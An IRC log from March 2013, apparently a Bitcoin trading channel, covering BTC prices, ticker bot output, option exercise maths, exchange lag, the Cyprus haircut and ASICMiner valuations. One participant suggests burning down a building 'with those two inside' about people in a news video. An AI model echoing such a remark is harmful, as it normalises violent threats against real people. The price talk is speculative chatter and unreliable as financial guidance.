BFL's factory pictures. Mar 25 19:01:44 http://imgur.com/a/KPBTl/noscript Mar 25 19:02:07 yet you still need gloves to handle it Mar 25 19:02:34 the machinine is called Sam? Mar 25 19:02:38 Bugpowder, yeah but now Avalon costs 75btc each! Mar 25 19:02:45 i mean S(and)M Mar 25 19:03:02 hi garr! Mar 25 19:03:09 Not buying at those prices Mar 25 19:03:20 wait to $1000 to buy more Mar 25 19:03:22 these are Avalon labs? Mar 25 19:03:43 hi goat Mar 25 19:03:50 yes Mar 25 19:04:02 [BTCTC] [ASICMINER-PT] 3 @ 0.818995 = 2.457 BTC [+] Mar 25 19:04:06 how old is that kid anyway? Mar 25 19:04:24 I remember him vaguely being two years older than me Mar 25 19:04:27 Bowjob: see http://xkcd.com/936/ (and you already came up with a couple of sets of three memorable words above) Mar 25 19:04:39 not sure where that came from, but if I'm correct he's 19 :P Mar 25 19:06:11 the3se are not bfl labs lol Mar 25 19:06:25 That's avalon Mar 25 19:06:25 these are the labs they paid to make their shit Mar 25 19:06:35 ^^ exactly Mar 25 19:06:42 benefits to being in china Mar 25 19:06:44 no one in btc land owns the machines Mar 25 19:06:56 i dnt care who took the photos Mar 25 19:07:58 yup Mar 25 19:08:00 soo what's new Mar 25 19:08:44 78 Mar 25 19:09:02 ;;ticker Mar 25 19:09:04 BTCUSD ticker | Best bid: 75.50001, Best ask: 76.27129, Bid-ask spread: 0.77128, Last trade: 77.00000, 24 hour volume: 72307.04792886, 24 hour low: 68.50000, 24 hour high: 78.00000, 24 hour vwap: 73.42654 Mar 25 19:09:08 ha. nice. Mar 25 19:09:20 broke thru at 15:02 Mar 25 19:09:33 not a bad prediction Mar 25 19:09:57 dat gmt? Mar 25 19:10:06 yup Mar 25 19:10:20 last two then mp. Mar 25 19:10:48 so... $81 at this time tomorrow? Mar 25 19:11:38 or sooner Mar 25 19:11:44 that is the question Mar 25 19:13:05 back to 77, eh? Mar 25 19:13:17 yeah Mar 25 19:13:25 so... 40% haircut for cyprus? Mar 25 19:13:29 over 100k Mar 25 19:14:04 yeah. 8 i mean 20 i mean 40% Mar 25 19:14:14 1 day bank holiday i mean 3 i mean 2 weeks Mar 25 19:14:28 won't happen again one off thing i mean one off thing each country i mean monthly from now on Mar 25 19:14:54 [MPEX] [O.BTCUSD.C750T] 1 @ 0.065682 BTC [+] Mar 25 19:15:32 and still... certain people freaked out about notion to convert all fiat income into btc Mar 25 19:15:41 and convert back only as necessary Mar 25 19:16:04 amirite, tiberiusiv? Mar 25 19:16:29 well the problem that im seeing now is if banks close its harder to liquidate coins Mar 25 19:16:37 you need go p2p cash Mar 25 19:16:44 which might not be as convinient Mar 25 19:17:01 it's not convenient but always possible Mar 25 19:17:24 its possible but you should have some buffer in cash Mar 25 19:18:12 that's my irl experience, converting couple hundred btc eveny 2wk is absolutely not a problem Mar 25 19:18:34 *coupe hundred euros i mean Mar 25 19:18:52 yes its not a problem Mar 25 19:18:55 until the banks are closed Mar 25 19:18:58 :) Mar 25 19:19:04 i mean, in cash Mar 25 19:19:05 you cant get if off bitstamp Mar 25 19:19:08 a ok Mar 25 19:19:19 yes its doable Mar 25 19:19:30 just not as convinient - for me. Mar 25 19:19:49 ofc, i prefer to do it via bank anytime possible Mar 25 19:20:14 Anyone know the story on this: http://pastebin.com/Cxd64VtV ? Mar 25 19:20:49 but the point is doing by localbitcoins isn't so big hassle Mar 25 19:21:21 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06595317 BTC [+] Mar 25 19:21:28 course at that point aren't supposed to abide by the FinCen guidlines, you would be money transmitter.. Mar 25 19:21:42 lol, I accidentally a couple words Mar 25 19:22:05 deadweasel: even <$1000/day? Mar 25 19:22:16 haha, slovak financial office will wake up about it in next decade maybe Mar 25 19:22:20 i'd have to re-read, I thought any amount into USD. Mar 25 19:22:22 I read it that if you keep sales to < $1000 day its ok Mar 25 19:22:38 but it seemed that there was some conflicting language Mar 25 19:22:41 about exceptions Mar 25 19:22:48 deadweasel: yeah, but not everyone is 'merican Mar 25 19:22:55 so, 10BTC per day ;) I'll go re-read that. Mar 25 19:23:00 lucky smickles Mar 25 19:23:09 not lucky smickles, lucky jurov Mar 25 19:23:17 from what enlightened country do you hail from, jurov Mar 25 19:23:18 ? Mar 25 19:23:19 and kakobrekla Mar 25 19:23:32 and a good many others here Mar 25 19:23:43 well, I'm holding out for revolution, I won't leave yet. Mar 25 19:24:16 Although I've never lived more than a few hours drive from either canada or mexico Mar 25 19:24:23 i like options. Mar 25 19:24:35 != OIX Mar 25 19:24:54 $vwap oix Mar 25 19:24:55 anyway, i'll deal with being a money transmitter if I ever need to. Mar 25 19:24:56 smickles: ^OIX 1 day: no data 7 day: average: 69.84225586 high: 71.09794195 low: 51.2906147 volume: 27746 btc: 6572.62564493 30 day: no data Mar 25 19:26:51 :) Mar 25 19:28:54 ;;ticker Mar 25 19:28:55 BTCUSD ticker | Best bid: 76.60000, Best ask: 76.74999, Bid-ask spread: 0.14999, Last trade: 76.60000, 24 hour volume: 73428.60406774, 24 hour low: 69.20000, 24 hour high: 78.00000, 24 hour vwap: 73.54512 Mar 25 19:28:57 ;;goxlag Mar 25 19:28:59 1.493887 seconds Mar 25 19:29:39 btw Bugpowder seen http://trilema.com/2013/smpoe-market-cap-vs-sdice-market-cap/ ? Mar 25 19:29:52 TomServo seems like trollish nonsense to me. Mar 25 19:31:41 mircea_popescu: I suspect we will see a rotation out of S.MPOE this month. Mar 25 19:31:52 possibly Mar 25 19:31:54 if my intuition about MPOE performance is correct Mar 25 19:33:00 this BTC price is really tough for S.DICE to overcome though. But its good for MPOE Mar 25 19:33:10 or neutral Mar 25 19:33:20 "close to 30 million usd notional trade this month" Mar 25 19:33:25 sounds pretty good to me. Mar 25 19:33:42 plenty of markets don't get 1mn a day Mar 25 19:33:44 yea. Approaching 400,000 contracts right? Mar 25 19:33:48 yeah Mar 25 19:34:19 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06621708 BTC [+] Mar 25 19:35:09 it's getting to where im starting to smell the offers tbh. Mar 25 19:35:47 smell the offers? Mar 25 19:35:48 mpex happens to be the PERFECT way for a bank to develop it's own in house btc-fiat trading system Mar 25 19:36:00 propped against mpex, guaranteed success. Mar 25 19:36:23 oh you... Mar 25 19:36:41 one way to eat everyone's cake, seeing how coinbases of the world can't compete. Mar 25 19:36:43 propping the price with the ole buyout rumor... Mar 25 19:36:55 you should send a tip to Cramer Mar 25 19:36:57 nah, there won't be a buyout Mar 25 19:37:06 Bugpowder i been sendin' tips. Mar 25 19:37:51 sheeeit Mar 25 19:37:52 ;;ticker Mar 25 19:37:53 BTCUSD ticker | Best bid: 76.00000, Best ask: 77.01000, Bid-ask spread: 1.01000, Last trade: 75.50000, 24 hour volume: 73639.35968273, 24 hour low: 69.25000, 24 hour high: 78.00000, 24 hour vwap: 73.57049 Mar 25 19:37:57 lagged Mar 25 19:37:59 [HAVELOCK] [HIM] 1 @ 1.98 BTC [+] Mar 25 19:38:09 73 Mar 25 19:38:12 ;;goxlag Mar 25 19:38:13 [BTCTC] [RSM] 1 @ 0.00312 BTC [+] Mar 25 19:38:13 157.509317 seconds Mar 25 19:38:16 lmap Mar 25 19:38:21 $mpexlag Mar 25 19:38:23 mircea_popescu: 0.109438180923 seconds Mar 25 19:38:23 [BTCTC] [RSM] 1077 @ 0.00311 = 3.3495 BTC [-] Mar 25 19:38:26 dun dun dun Mar 25 19:38:27 72 Mar 25 19:38:32 i wonder if this'll ever get old. Mar 25 19:38:49 71.8 Mar 25 19:38:52 bottom Mar 25 19:39:23 couldn't even trigger the OH NOES cartoon on bitcoinity Mar 25 19:39:28 [BTCTC] [RSM] 1 @ 0.00311 BTC [-] Mar 25 19:40:05 oh shit! Mar 25 19:40:18 That selloff was from half the wall at 80 selling to market :) Mar 25 19:40:22 so normal exchanges have high speed connections to hig profile brokerages. These things don't break like this. There is in opportunity to improve this. Mar 25 19:40:33 ;;asks 80 Mar 25 19:40:36 There are currently 5535.7599 bitcoins offered at or under 80.0 USD, worth 438703.38709 USD in total. | Data vintage: 0.0019 seconds Mar 25 19:40:39 YES. Mar 25 19:40:46 ;;bids 70 Mar 25 19:40:46 There are currently 2614.6875 bitcoins demanded at or over 70.0 USD, worth 184818.944829 USD in total. | Data vintage: 10.4289 seconds Mar 25 19:41:01 deadweasel yes there is something like that already ;) Mar 25 19:41:16 the answer feels like it's going to be obvious........ Mar 25 19:41:34 deadweasel yea. Mar 25 19:41:40 deadweasel: bitfloor was doing that, but people lost confidence in it after a theft Mar 25 19:41:56 oh, and mpex owns all Mar 25 19:42:20 mircea_popescu: is that what you are doing with the OIX? Mar 25 19:42:29 "that" ? Mar 25 19:42:44 well, no lag at mpex, 2 minutes at gox. Mar 25 19:43:01 i got better hardware. Mar 25 19:43:46 must not be enough incentive for gox to fix the problem Mar 25 19:43:47 its not a fair comparison ATM Mar 25 19:44:06 compare with the same order load Mar 25 19:44:13 considering volume... Mar 25 19:44:15 [MPEX] [O.BTCUSD.C750T] 1 @ 0.06622534 BTC [+] Mar 25 19:44:40 Bugpowder you don't see the stat/cancel/bid cycle Mar 25 19:44:40 lag is non-linear with load Mar 25 19:44:48 i think there's more load on mpex than mtgox atm. Mar 25 19:44:53 hmmm Mar 25 19:45:01 ddos still going? Mar 25 19:45:05 I dunno... lots of micro txns. Mar 25 19:45:05 also http://polimedia.us/dtng/c/src/128220157798.jpg Mar 25 19:45:08 on gox Mar 25 19:45:14 jurov nope, subsided. Mar 25 19:45:18 O.BTCUSD.C750T -- if I bought one of those, what does that mean? Mar 25 19:45:18 god damn it. Mar 25 19:45:28 call struck at 75 expiring friday Mar 25 19:45:35 deadweasel it means you're long btc Mar 25 19:45:42 break even is about 80. Mar 25 19:46:04 ;;goxlag Mar 25 19:46:05 301.313038 seconds Mar 25 19:46:50 so if I bough that, I could buy BTC at 75$ up til friday? Mar 25 19:47:34 nominally. Mar 25 19:47:36 you could exercise it for (24vwap - $75) / 24vwap till midnight friday Mar 25 19:47:49 ;;bc,24hprc Mar 25 19:47:50 73.42 Mar 25 19:48:00 actaully 24hprc, not 24vwap Mar 25 19:48:05 gox is like imma let you finish, but... Mar 25 19:48:12 right now, it's out of the money tho Mar 25 19:48:25 but the spot price is ITM Mar 25 19:48:35 so the option is potentially underpriced Mar 25 19:48:57 spot price is ITM? Mar 25 19:49:07 depending if you believe 24hprc is going to go to the spot Mar 25 19:49:12 in the money (if that's what you're asking) Mar 25 19:49:16 spot is $76 Mar 25 19:49:16 73 < 75 neh ? Mar 25 19:49:26 ;;ticker Mar 25 19:49:27 BTCUSD ticker | Best bid: 75.95000, Best ask: 76.27129, Bid-ask spread: 0.32129, Last trade: 75.60270, 24 hour volume: 73639.35968273, 24 hour low: 69.25000, 24 hour high: 78.00000, 24 hour vwap: 73.57049 Mar 25 19:49:33 aok Mar 25 19:49:48 by spot I mean last trade. Mar 25 19:50:02 so lets say 24hrprc is $80... (80-75)/80 = .0625 Mar 25 19:50:06 yes Mar 25 19:50:30 [MPEX] [S.MPOE] 4314 @ 0.00062626 = 2.7017 BTC [-] Mar 25 19:50:31 [MPEX] [S.MPOE] 1800 @ 0.0006289 = 1.132 BTC [+] Mar 25 19:50:47 so current ask on the 750s is .66 Mar 25 19:50:49 what it went back up ? Mar 25 19:50:49 .066 Mar 25 19:51:15 $depth c750t Mar 25 19:51:16 smickles: O.BTCUSD.C750T Bids: ['1 @ 0.06615541', '1000 @ 0.0398513'] Mar 25 19:51:17 ;;calc (81-75)/81 Mar 25 19:51:18 smickles: Asks: ['1000 @ 0.06621656', '5 @ 0.0869', '9 @ 0.08826052'] Mar 25 19:51:18 0.0740740740741 Mar 25 19:51:28 ;;calc (80.2-75)/80.2 Mar 25 19:51:29 0.0648379052369 Mar 25 19:51:52 yah, you need 24vwap to hit 80.3 to make a profit from exercise Mar 25 19:52:23 though the MPOE bot always pays a time premium over the current 24hprc with its bids Mar 25 19:52:43 ok, so you want your (24hvwap - 75) >= price of option? Mar 25 19:52:52 so exercise only makes sense if you have >>1000 contracts and want to dump fast, or the bot is down (last 24 hrs of the month). Mar 25 19:53:01 oops, divided by the 24hrvwap Mar 25 19:53:16 24hprc.... volume weighted across all exchanges Mar 25 19:53:24 [MPEX] [S.MPOE] 15600 @ 0.0006289 = 9.8108 BTC [+] Mar 25 19:53:26 from here : http://bitcoincharts.com/markets/currencies/ Mar 25 19:54:46 deadweasel http://trilema.com/2013/introducing-the-oix/ Mar 25 19:54:50 ok, i think I see. Mar 25 19:54:51 see the notes, calculations explained in there. Mar 25 19:54:53 oh, thx mircea_popescu Mar 25 19:55:41 !ticker h vtx Mar 25 19:55:42 [HAVELOCK:VTX] 1D: 0.63210000 / 0.76199 / 0.79900000 (338 shares, 257.55262083 BTC), 7D: 0.38280000 / 0.41597608 / 0.79900000 (10987 shares, 4570.32919395 BTC), 30D: 0.38280000 / 0.41597608 / 0.79900000 (10987 shares, 4570.32919395 BTC) Mar 25 19:55:58 jurov the way i figure it, either attacker is defeated and depressed or else we see a new blast in a week or two. Mar 25 19:56:19 the current one didn't work. Mar 25 19:56:58 [HAVELOCK] [VTX] 1 @ 0.77 BTC [-] Mar 25 19:57:39 ya know, i throw about 12 commands at mpex all at once Mar 25 19:57:45 *BAM* Mar 25 19:58:03 all the f-ing time. I can't be the only one Mar 25 19:58:36 you're not Mar 25 19:59:41 i do too, occasionally. Mar 25 19:59:49 holy shit transactions are slow to get into blocks today Mar 25 20:01:23 oh and i was just about to bug mp one of these days to add multi op Mar 25 20:01:27 is there a manual for it Mar 25 20:02:13 there's no real advantage to multiop Mar 25 20:03:09 kakobrekla: i just use threadding in my code Mar 25 20:03:12 can i do a few CANCEL|N in several lines and signcrypt that? Mar 25 20:03:27 nope Mar 25 20:03:27 that would be nice Mar 25 20:03:30 why ? Mar 25 20:03:44 cause i do stuff manually Mar 25 20:03:58 !ticker m ^OIX Mar 25 20:03:59 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.2906147 / 69.84313456 / 71.09885312 (27748 shares, 6,572.76 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 25 20:03:59 yeah, but it'd just need more code to decide if you've got lines or wtf. Mar 25 20:04:06 uh? Mar 25 20:04:18 its one exlode new line Mar 25 20:04:22 and then foreach commands Mar 25 20:04:29 explode* Mar 25 20:04:37 basic stuff Mar 25 20:04:52 ;;goxlag Mar 25 20:04:53 13.344597 seconds Mar 25 20:04:55 ;;ticker Mar 25 20:04:58 BTCUSD ticker | Best bid: 74.20000, Best ask: 74.25000, Bid-ask spread: 0.05000, Last trade: 74.25000, 24 hour volume: 78120.01656022, 24 hour low: 69.51777, 24 hour high: 78.00000, 24 hour vwap: 73.67017 Mar 25 20:09:58 [HAVELOCK] [SDICE] 1 @ 0.49999999 BTC [+] Mar 25 20:10:58 [HAVELOCK] [SDICE] 1 @ 0.5000001 BTC [+] Mar 25 20:11:45 [MPEX] [S.MPOE] 9700 @ 0.00062546 = 6.067 BTC [-] Mar 25 20:16:15 ;;bids 0 Mar 25 20:16:18 There are currently 36901808 bitcoins demanded at or over 0.0 USD, worth 6991511.75172 USD in total. | Data vintage: 0.0205 seconds Mar 25 20:23:48 [BTCTC] [ASICMINER-PT] 1 @ 0.818995 BTC [+] Mar 25 20:25:39 [BTCTC] [BASIC-MINING] 1 @ 0.344 BTC [+] Mar 25 20:29:27 [BTCTC] [GOLD] 2 @ 0.202 = 0.404 BTC [-] Mar 25 20:30:50 ;;asks 79.94 Mar 25 20:30:52 There are currently 6216.5875 bitcoins offered at or under 79.94 USD, worth 483397.146716 USD in total. | Data vintage: 0.0021 seconds Mar 25 20:31:05 [BTCTC] [BTC-BOND] 31 @ 0.009821 = 0.3045 BTC [-] Mar 25 20:31:07 [BTCTC] [BTC-BOND] 74 @ 0.00982 = 0.7267 BTC [-] Mar 25 20:33:18 We are up and running tournament at sc2bt.com, Join us for a couple of games of starcraft with BTC prize pool :D Mar 25 20:39:14 ;;bc,stats Mar 25 20:39:18 Current Blocks: 227989 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1834 blocks | Next Difficulty In About: 1 week, 6 days, 2 hours, 24 minutes, and 0 seconds | Next Difficulty Estimate: 6675621.2732 | Estimated Percent Change: -0.30176 Mar 25 20:39:28 :o Mar 25 20:39:58 ;;estimate Mar 25 20:40:01 Next difficulty estimate | 6675621.2732 based on data since last change | 7300703.18663 based on data for last three days Mar 25 20:41:40 [BTCTC] [BASIC-MINING] 1 @ 0.332 BTC [-] Mar 25 20:41:47 [BTCTC] [BASIC-MINING] 6 @ 0.33002 = 1.9801 BTC [-] Mar 25 20:50:36 avalons stopped working Mar 25 20:50:40 diff sinking Mar 25 20:51:21 whoopsie Mar 25 20:51:25 it's early :P Mar 25 20:51:40 [BTCTC] [BTC-BOND] 53 @ 0.009899 = 0.5246 BTC [+] Mar 25 20:51:42 [BTCTC] [BTC-BOND] 64 @ 0.009899 = 0.6335 BTC [+] Mar 25 20:51:47 [BTCTC] [BTC-BOND] 455 @ 0.0099 = 4.5045 BTC [+] Mar 25 20:52:49 "the price can not go up by 400% in only 10 weeks, price cannot go exponential." Mar 25 20:52:56 lol Mar 25 20:53:02 this guy has a keen grasp on reality Mar 25 20:53:08 anyway, too much excitement for one day. catch y'all tomorrow Mar 25 20:53:13 c'ya Mar 25 20:53:58 [HAVELOCK] [SDICE] 1 @ 0.4611 BTC [-] Mar 25 20:58:18 yay finally got a -10 in otc! Mar 25 20:58:40 ;;getrating kakobrekla Mar 25 20:58:40 WARNING: Currently not authenticated. User kakobrekla, rated since Fri May 13 15:50:53 2011. Cumulative rating 89, from 55 total ratings. Received ratings: 54 positive, 1 negative. Sent ratings: 57 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=kakobrekla Mar 25 20:58:48 scammer~! Mar 25 20:58:58 lol Mar 25 20:58:59 [HAVELOCK] [SDICE] 3 @ 0.4611 = 1.3833 BTC [-] Mar 25 20:59:24 was trying to avoid that supa guy but eh i guess it was inevitable Mar 25 20:59:25 what did you do to piss off supadupajenkins? Mar 25 20:59:46 dunno he gets banned all the time everywhere Mar 25 20:59:56 perhaps i did it a couple of times too Mar 25 20:59:58 [HAVELOCK] [SDICE] 3 @ 0.461 = 1.383 BTC [-] Mar 25 21:00:04 but im thinking Mar 25 21:00:15 he is behind recent spamming Mar 25 21:00:19 lol, looking at his -10 list, it's like a who's who of -otc Mar 25 21:00:24 that was happening on the chans Mar 25 21:02:46 <[\\\]> he started with the highest rated people **** BEGIN LOGGING AT Tue Mar 26 05:31:14 2013 Mar 26 05:31:17 personally i dont like lending btc out, unless its absolutely certain ill get it back Mar 26 05:31:36 if i had "borrowed" 10k btc a year ago i'd be *poof* right about now Mar 26 05:31:40 thats a pretty high bar. Mar 26 05:31:41 lol, I prefer lending it when I don't know what will happen... Mar 26 05:31:45 pretty difficult to repay that Mar 26 05:31:53 jcpham i borrowed ~10k exactly a year ago. Mar 26 05:31:56 need a real good business plan if you spent it Mar 26 05:32:02 [HAVELOCK] [SDICE] 1 @ 0.5 BTC [+] Mar 26 05:32:19 if you converted it to fiat you are fucked Mar 26 05:32:31 i didn't. teh original mpoe bonds got like 9500 or so btc Mar 26 05:32:35 most of that's unmoved. Mar 26 05:33:15 good chance of digging out of the hole by staying in btc Mar 26 05:33:20 https://bitcointalk.org/index.php?topic=73599.0 Mar 26 05:33:22 for 5 years Mar 26 05:33:47 he earns in BTC, but its idk. Mar 26 05:34:04 anything you could have bought over the last year, other than btc, you lot money on technically Mar 26 05:34:21 so it's a hard loan to me financially Mar 26 05:34:27 i bleedb money though Mar 26 05:34:45 there was a guy on the forum servicing a long term btc loan Mar 26 05:34:51 old timer. name escapes me atm Mar 26 05:35:00 taken when btc was like 5 or some shit Mar 26 05:35:20 loans are like gift. the blockchain is god. Mar 26 05:35:24 [BTCTC] [ASICMINER-PT] 1 @ 0.7832 BTC [-] Mar 26 05:35:29 [BTCTC] [ASICMINER-PT] 2 @ 0.7831 = 1.5662 BTC [-] Mar 26 05:35:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7821 BTC [-] Mar 26 05:35:33 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [-] Mar 26 05:35:36 [BTCTC] [ASICMINER-PT] 6 @ 0.77727 = 4.6636 BTC [-] Mar 26 05:35:38 [BTCTC] [ASICMINER-PT] 13 @ 0.77726 = 10.1044 BTC [-] Mar 26 05:35:40 [BTCTC] [ASICMINER-PT] 4 @ 0.77725 = 3.109 BTC [-] Mar 26 05:35:42 [BTCTC] [ASICMINER-PT] 1 @ 0.77721 BTC [-] Mar 26 05:35:44 [BTCTC] [ASICMINER-PT] 2 @ 0.777 = 1.554 BTC [-] Mar 26 05:35:46 um' Mar 26 05:35:46 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Mar 26 05:35:49 [BTCTC] [ASICMINER-PT] 3 @ 0.769 = 2.307 BTC [-] Mar 26 05:35:50 [BTCTC] [ASICMINER-PT] 1 @ 0.762 BTC [-] Mar 26 05:35:53 [BTCTC] [ASICMINER-PT] 32 @ 0.761105 = 24.3554 BTC [-] Mar 26 05:35:54 honeymoon over ? Mar 26 05:35:55 [BTCTC] [ASICMINER-PT] 5 @ 0.761101 = 3.8055 BTC [-] Mar 26 05:35:57 [BTCTC] [ASICMINER-PT] 5 @ 0.760002 = 3.8 BTC [-] Mar 26 05:36:00 how people keep getting BTC given to them as loans is utterly mystifying to me. Mar 26 05:36:00 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 26 05:36:22 wowwww almost 50BTC in shares Mar 26 05:36:29 2/3 of an avalon Mar 26 05:36:49 not that much Mar 26 05:37:01 probly just someone who moved from friedcat to btct to sell Mar 26 05:37:20 !ticker btctc asicminer-pt Mar 26 05:37:23 [BTCT:ASICMINER-PT] 1D: 0.78 / 0.79829 / 0.829 (209 shares, 166.8 BTC), 7D: 0.761102 / 0.83118 / 0.93 (1541 shares, 1280.8 BTC), 30D: 0.65 / 0.77396 / 1 (4449 shares, 3443.3 BTC) Mar 26 05:37:34 now that's interestying Mar 26 05:37:41 1D: 0.78 vs [BTCTC] [ASICMINER-PT] 5 @ 0.76000 Mar 26 05:38:05 well, the market is uhhh.... a little -thin- below 0.75 Mar 26 05:38:21 ThickAsThieves the girl's early estimate was .75 to 1.5 Mar 26 05:38:22 https://btct.co/security/ASICMINER-PT Mar 26 05:38:24 then they kinda blew it Mar 26 05:38:32 then people were rooting for "oh, we'll reach 1 anyway" Mar 26 05:38:34 then... Mar 26 05:38:41 16 shares of bid over 0.01 Mar 26 05:39:01 o.o Mar 26 05:39:03 that bad, rly ? Mar 26 05:39:08 that bad? Mar 26 05:39:10 if asicminer reaches 1 btc.. Mar 26 05:39:19 that means they expect asicminer to make at least 400k BTC Mar 26 05:39:19 there is no depth its hardly representative of value Mar 26 05:39:20 mircea_popescu: the girl's estimates were .075 to 0.15 no? Mar 26 05:39:21 thats crazy shit Mar 26 05:39:24 BF goes deeper Mar 26 05:39:24 ;;ticker Mar 26 05:39:24 BTCUSD ticker | Best bid: 75.30000, Best ask: 75.37700, Bid-ask spread: 0.07700, Last trade: 75.55000, 24 hour volume: 80678.53152168, 24 hour low: 69.80000, 24 hour high: 78.00000, 24 hour vwap: 74.58758 Mar 26 05:39:31 Bugpowder_ no, .75 to 1.5 iirc Mar 26 05:39:41 per share? Mar 26 05:39:43 I don't think so Mar 26 05:39:45 https://bitcointalk.org/index.php?topic=144319.0 Mar 26 05:40:02 yeah she said about that Mar 26 05:40:06 All these things considered it is perhaps not unreasonable to judge ASICMiner revenue generation ability in the 5 to 15k BTC a month range. If this is in fact correct it's also not unreasonable to judge ASICMiner's market cap roughly equal or a little under that of Satoshi Dice, in which case the 400,000 share company would be worth on MPEx somewhere between 3 and 600k BTC, or between .75 and 1.5 BTC per share, making Mar 26 05:40:08 Bitfountain the third multi-million dollar Bitcoin public corp in Bitcoin history. Mar 26 05:40:20 it wouldve hit 1+ if they actually got to 12TH+ Mar 26 05:40:37 It's unclear how much risk discount investors would be wanting to apply to that valuation, and it's also unclear how much discount will willy-nilly end up being applied in the event ASICMiner actually foregoes liquidity and lists on some marginal venue. But in any case things look pretty bright at the moment, so well done! Mar 26 05:40:47 golden mouth girl. Mar 26 05:40:54 inb4 its .9 again Mar 26 05:41:11 50 shares moving doesn't mean shit Mar 26 05:41:40 morel ike 100 i think Mar 26 05:42:16 did you see the latest taaki video? Mar 26 05:42:29 no lol Mar 26 05:42:35 is he cutting ? Mar 26 05:42:37 [BTCTC] [BASIC-MINING] 1 @ 0.343 BTC [+] Mar 26 05:42:38 [BTCTC] [BASIC-MINING] 4 @ 0.344 = 1.376 BTC [+] Mar 26 05:42:46 http://www.guardian.co.uk/technology/video/2013/mar/22/bitcoin-currency-video?INTCMP=SRCH Mar 26 05:43:49 we need to identify that building and burn it down with those two inside Mar 26 05:44:48 What would be the appropriate subform to post an add to borrow asicminer shares? Mar 26 05:44:59 for shorting purposes Mar 26 05:45:44 Bugpowder_ heh. let me find it Mar 26 05:46:04 I mean, its a good company. Mar 26 05:46:12 but the valuation is looking pretty frothy Mar 26 05:47:17 ;;estimate Mar 26 05:47:18 Next difficulty estimate | 6880830.90136 based on data since last change | 7242616.81723 based on data for last three days Mar 26 05:47:18 asicminer sell off lol? Mar 26 05:47:50 Bugpowder_ https://bitcointalk.org/index.php?topic=151265.msg1605879#msg1605879 Mar 26 05:47:53 ask that guy. Mar 26 05:48:02 [HAVELOCK] [SDICE] 2 @ 0.5 = 1 BTC [+] Mar 26 05:48:03 [HAVELOCK] [SDICE] 21 @ 0.5 = 10.5 BTC [+] Mar 26 05:48:13 mp one sell off on a thin market, still the only real asic company out there Mar 26 05:48:30 bfl had a non updated lol Mar 26 05:48:35 Chaang-Noi operations were never their problem. Mar 26 05:48:52 but theres a LOT more to success than just that. Mar 26 05:48:58 as unromantic as this may sound, it's true. Mar 26 05:49:02 [HAVELOCK] [SDICE] 2 @ 0.5 = 1 BTC [+] Mar 26 05:49:22 ah, that thread was the one I was thinking of for the girl's estimates Mar 26 05:49:31 dividends wont end anytime soon, not sure what the value really should be at but im not selling mine:) Mar 26 05:49:47 you sold some to me a month ago ;) Mar 26 05:49:52 .425 Mar 26 05:49:55 !ticker h vtx Mar 26 05:49:57 [HAVELOCK:VTX] 1D: 0.50000000 / 0.72040307 / 0.79900000 (418 shares, 301.12848142 BTC), 7D: 0.38280000 / 0.41873282 / 0.79900000 (11129 shares, 4660.07750417 BTC), 30D: 0.38280000 / 0.41873282 / 0.79900000 (11129 shares, 4660.07750417 BTC) Mar 26 05:50:10 yeah im not selling more, i had to get some cash Mar 26 05:50:14 lol right. well done topace Mar 26 05:50:31 2x asicminer volume yest. why is that ? is cavirtex a larger corp than asicminer ? Mar 26 05:50:45 canadians love their companies Mar 26 05:50:54 at the rate this is going, it's gonna be actually. Mar 26 05:50:56 you cant see asicminer trade volume mp, only one of two pt Mar 26 05:51:00 unless they fuck up their registrations Mar 26 05:51:05 !ticker h sdice Mar 26 05:51:06 [HAVELOCK:SDICE] 1D: 0.45000000 / 0.48185851 / 0.52000000 (265 shares, 127.69250459 BTC), 7D: 0.40000000 / 0.48015951 / 0.53000000 (1375 shares, 660.21932648 BTC), 30D: 0.37000000 / 0.54970142 / 0.69400000 (5906 shares, 3246.53658408 BTC) Mar 26 05:51:08 Chaang-Noi listen, this is a nonargument. Mar 26 05:51:10 several people starting pumpin VTX at around .5 Mar 26 05:51:15 started* Mar 26 05:51:16 the fact that i can't see it speaks against it not excusing it. Mar 26 05:51:31 i couldnt understand the vtx pump either, i missed it Mar 26 05:51:35 yea pretty nuts Mar 26 05:51:40 and 0 dividend announced for vtx Mar 26 05:51:42 why are you talking about the trade volume if it is a nonargumnt? im just saying you cant see the real trade volume, that is a fact :/ Mar 26 05:51:43 any more ipos, topace Mar 26 05:51:51 incredibly people are still betting yes on bfl : https://twitter.com/BitBetsBets/status/316395891206549505 Mar 26 05:52:00 Bowjob: not in the immediate future Mar 26 05:52:09 mircea_popescu> 2x asicminer volume yest. why is that ? is cavirtex a larger corp than asicminer ? i was answering this question Mar 26 05:52:09 i was wrong about vtx, i didnt see any dividends, i didnt think it was gonna get funded Mar 26 05:52:12 Chaang-Noi the trade volume IS the controlling argument. Mar 26 05:52:13 much to my chargrin Mar 26 05:52:20 dude people bet on pirate for how long after he split? Mar 26 05:52:21 the fact that asicminer fucked up their ipo is NOT an excuse for them Mar 26 05:52:21 i learned though, if i see huge volume.. Mar 26 05:52:25 but the very problem they face. Mar 26 05:52:25 get in11 Mar 26 05:52:43 dub this is a point. Mar 26 05:52:46 yea VTX sold out in ~12 hours.. WITHOUT any pre-announcement of when teh IPO was happening Mar 26 05:52:50 but you dont even know what the vo;lume is, but i still disagree, some private companies are worth more than highly traded ones Mar 26 05:53:05 and the owner (joseph) didnt even email his user base to tell them about it either Mar 26 05:53:05 Chaang-Noi i know what the volume is. this : Mar 26 05:53:10 !ticker btct asicminer-pt Mar 26 05:53:12 [BTCT:ASICMINER-PT] 1D: 0.75 / 0.78997 / 0.829 (288 shares, 227.5 BTC), 7D: 0.75 / 0.82809 / 0.93 (1620 shares, 1341.5 BTC), 30D: 0.65 / 0.77385 / 1 (4528 shares, 3504 BTC) Mar 26 05:53:17 THAT is the volume. everything else is bullshit. Mar 26 05:53:22 that is one pt Mar 26 05:53:23 we have standards in btc, we stick to them. Mar 26 05:53:24 it was on the website on cavirtex.. i remember Mar 26 05:53:28 that they will announce an ipo soon Mar 26 05:53:31 pt is pass though, it is not real stock Mar 26 05:53:36 people 